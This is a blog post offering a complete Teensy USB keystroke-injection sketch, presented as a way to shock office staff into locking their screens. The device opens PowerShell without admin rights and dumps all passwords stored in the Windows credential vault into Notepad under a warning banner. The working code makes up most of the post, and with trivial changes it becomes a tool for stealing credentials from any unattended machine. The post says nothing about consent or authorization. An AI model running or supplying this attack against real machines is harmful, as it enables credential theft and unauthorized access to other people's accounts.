Teensy Script to Enforce Users Locking Screens (Non administrative Password Dump!!)

We try to express time and time again the threats posed by leaving your screen unlocked. These are often batted back with responses of:

  • I don’t have anything private on my screen
  • I’m only away for a minute nothing can happen
  • Aside from changing my screensaver… what else can be done?

Well this is akin to smokers declaring that nothing is wrong…. until theres a health scare to kick them into quitting (I know this from experience). Using this principle lets give our end users a little slap round the face with a Teensy script.

Once plugged in, the Teensy will do the following:

  1. Launch an unelevated Powershell prompt (no administrative access required).
  2. Run a brief few lines of code to dump the security credential cache to the clipboard.
  3. Open notepad….
  4. Paste a nice warning notice
  5. Paste the credential dump
  6. go back to the PoSh window and clear the clipboard and close the window.

You can then lock the screen manually. Doing this via the DLL can result in accidental reboots and shutdowns, so its not advised. I only have one password cached but the result will look like this…..

Script:

/*
  Author:         Davey Addison [ Secsi/@Supersafesecs ]
  Github:         github.com/Secsi
  Webby:          simpleinfosec.com

  Script to dump passwords stored in the windows cached credentials area onto Notepad.
  Script designed to act as a "shock treatment" to end users to enforce screen locking policies within a company.
*/

#if defined(CORE_TEENSY)
#define LED_PIN 6
#endif

void setup()
{

  // allow controlling LED
  pinMode(LED_PIN, OUTPUT);
  // turn the LED on while running
  digitalWrite(LED_PIN, HIGH);




  delay(2000);
  show_desktop();

  delay(200);
  posh();

  delay(500);
  Keyboard.println("$machine=hostname");
  delay(200);
  Keyboard.println("[void]");
  delay(200);
  Keyboard.println("[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]");
  delay(200);
  Keyboard.println("$vault = New-Object Windows.Security.Credentials.PasswordVault");
  delay(200);
  Keyboard.println("$vault.RetrieveAll()|% { $_.RetrievePassword();$_ }|clip");
  delay(200);
  Keyboard.println("notepad");
  delay(500);
  Keyboard.println("! ! ! ! ! L O C K   Y O U R   S C R E E N ! ! ! ! !");
  Keyboard.println("We got the following with a few seconds at your machine, while you were away.");
  delay(1000);
  send_paste();
  send_alttab();
  delay(200);
  Keyboard.println("echo off|clip");
  Keyboard.println("exit");
}

void loop(){
    // blink quickly when complete
  digitalWrite(LED_PIN, HIGH);
  delay(200);
  digitalWrite(LED_PIN, LOW);
  delay(200);
}

void show_desktop(){
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_D);
  Keyboard.send_now();
  delay(500);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void send_alttab(){
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_TAB);
  Keyboard.send_now();
  delay(100);

  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  }

void send_paste(){
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.set_key1(KEY_V);
  Keyboard.send_now();
  delay(100);

  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  }

void posh(){
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.send_now();
  delay(1000);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(2000);
  Keyboard.print("powershell");

  delay(2000);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();

  delay(200);
  Keyboard.set_key1(0);
  Keyboard.send_now();

}

 


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s